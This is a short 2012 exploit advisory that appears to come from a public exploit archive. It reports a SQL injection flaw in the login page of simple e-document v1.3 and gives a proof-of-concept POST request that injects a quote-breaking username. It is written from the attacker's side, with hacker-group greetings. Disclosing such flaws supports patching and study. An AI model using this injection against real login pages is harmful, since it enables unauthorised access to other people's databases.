simple e-document <= v1.3 SQL injection Vulnerability



EKU-ID: 1834 CVE: OSVDB-ID:
Author: Elite Trojan Published: 2012-04-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Exploit Title: simple e-document <= v1.3 SQL injection Vulnerability
# Date: 31/03/2012
# Author: Elite Trojan
# Category: webapps
# version: v1.3
# Vendor or Software Link: https://sourceforge.net/projects/simplee-doc/files/
# Google dork: Use ur mind
# Tested on: linux + windows
##################################################
[~]Exploit/p0c :

Its work by setting The POST variable username to Anything'"at :
http://localhost:80/a/simple_e_document_v_1_3/login.php

Example : username: admin'"
          Password: 123456
Use an HTTP Editor for Inject ur Ev!l3 with a request data like this : username=admin'"&password=test&op=login&Submit=Login

+--------------------------------------------------+
[»]                    #-DzMafia-#
[»] We are : password, eliteTrojan, gel-dz, BackUp
+--------------------------------------------------+
F0llow Us at : www.fb.me/Ma.dz.fia
+---------------------------------------------------+
[»] Greetz to :
[ TrOon,Aghilas,r00t_dz,Hacker-fire,Vaga-hacker,Imed Lakamora ]
[ & -> !Muslims!,Mosta,team152,Inj3ct0r ]
[ And all my Freinds + Algerian Hackers ]
-----------------------------------------------------+
DzMafia © 2012 All rights reserved.